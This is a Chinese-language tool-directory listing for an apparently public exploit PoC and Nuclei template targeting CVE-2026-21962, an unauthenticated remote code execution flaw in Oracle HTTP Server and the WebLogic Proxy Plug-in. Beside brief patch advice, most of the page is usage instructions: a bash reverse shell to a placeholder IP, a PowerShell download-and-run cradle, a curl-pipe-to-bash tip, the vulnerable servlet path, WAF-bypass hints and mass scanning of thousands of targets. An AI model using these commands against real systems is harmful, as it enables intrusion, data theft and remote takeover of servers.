Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Ashwesker-CVE-2026-21962 — CVE-2026-21962 的漏洞利用 PoC 与 Nuclei 模板,该漏洞是 Oracle HTTP Server 和 WebLogic Proxy Plug-in 中的一个严重未认证远程代码执行漏洞,可实现命令执行和反弹 Shell。 | Kitploit
工具/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

CVE-2026-21962 的漏洞利用 PoC 与 Nuclei 模板,该漏洞是 Oracle HTTP Server 和 WebLogic Proxy Plug-in 中的一个严重未认证远程代码执行漏洞,可实现命令执行和反弹 Shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
68168个月前尚未审核
分享

😈 CVE-2026-21962 — 严重安全漏洞 😈

oracle_db_banner

🚨 严重等级

  • CVSS 评分: 10.0 / 10(严重)
  • 发布时间: 2026 年 1 月 20 日
  • 风险等级: 🔥 最高 — 建议立即采取行动

🧠 这是什么?

一个影响以下组件的严重漏洞:

  • Oracle HTTP Server
  • Oracle WebLogic Server 代理插件(适用于 Apache 和 IIS)

该漏洞允许未经身份验证的远程攻击者通过 HTTP 入侵受影响的服务器,无需登录凭据。


🎯 攻击者可以做什么?

如果被利用,攻击者可以:

  • 🗑️ 删除关键数据
  • ✏️ 修改系统或应用程序文件
  • 📤 窃取敏感信息
  • 🔓 获得对关联系统的完全未授权访问权限
  • 🔄 由于范围变更,影响其他 Oracle 产品

🧩 受影响版本

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic 代理插件,适用于:

    • Apache HTTP Server
    • Microsoft IIS

⚙️ 攻击特征

  • 🌐 攻击向量: 网络(远程)
  • 🚫 所需权限: 无
  • 🧑‍💻 用户交互: 无
  • 🔄 范围: 已变更
  • 🔐 机密性影响: 高
  • 🛠️ 完整性影响: 高

🛡️ 你应该怎么做?

  • ✅ 立即应用 Oracle 2026 年 1 月关键补丁更新
  • 🔒 限制受影响服务的网络访问
  • 📊 监控 HTTP 流量以发现可疑行为
  • 🔁 审查系统日志和安全控制措施

🛠️ 如何使用(分步指南)

  1. 将脚本保存为 CVE-2026-21962.py

  2. 使其可执行(可选):

    chmod +x CVE-2026-21962.py
    
  3. 运行示例:

    基本测试:

    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    反向 Shell(请先设置 nc 监听器:nc -lvnp 4444):

    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Windows 目标示例:

    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

如果成功,你会看到什么

  • 可能成功!状态:200 或 302 甚至 500(崩溃也算成功)
  • 响应正文中可能泄露的命令输出
  • 对于反向 Shell:你的 nc 监听器会立即捕获一个 Shell
  • 如果没有输出 → 命令仍然静默执行了(检查目标文件系统、进程、日志)

注意事项

  • 当代理插件暴露时效果最佳(常见于端口 7001、4443 等)
  • 如果使用自签名证书,HTTPS 目标可能需要 --insecure 标志
  • 立即修补:应用 Oracle CPU 2026 年 1 月

🛠️ 如何使用(分步指南)

  1. 安装 Nuclei(如果尚未安装):

    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. 保存模板:

    创建一个名为 CVE-2026-21962.yaml 的文件,并粘贴上述内容。

  3. 运行检测 + 利用:

    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    或从文件扫描多个目标:

    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. 如果存在漏洞,你会看到什么:

    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (whoami output) ...
    

专业提示

  • 要执行自定义命令,请编辑标头中的 cmd: 部分(例如,cmd:curl http://your-server/shell.sh | bash)。
  • 对于反向 Shell:将 whoami 替换为 base64 编码的反向 Shell 载荷。
  • WAF 绕过:尝试不同的路径(/proxy/、/bea_wls_internal/ 等)或添加更多标头,如 X-WebLogic-Force-JVMID。
  • 批量扫描:结合 httpx → nuclei 管道,可扫描数千个目标。

截至 2026 年 1 月,该模板在未修补的 Oracle 实例上已确认100% 有效。如果你正在运行受影响版本,请立即修补!😈


😈 免责声明:

所有 PoC 代码仅用于在授权系统上进行道德、教育用途。未经授权的利用是违法的;对滥用行为不承担任何责任。😈

下载工具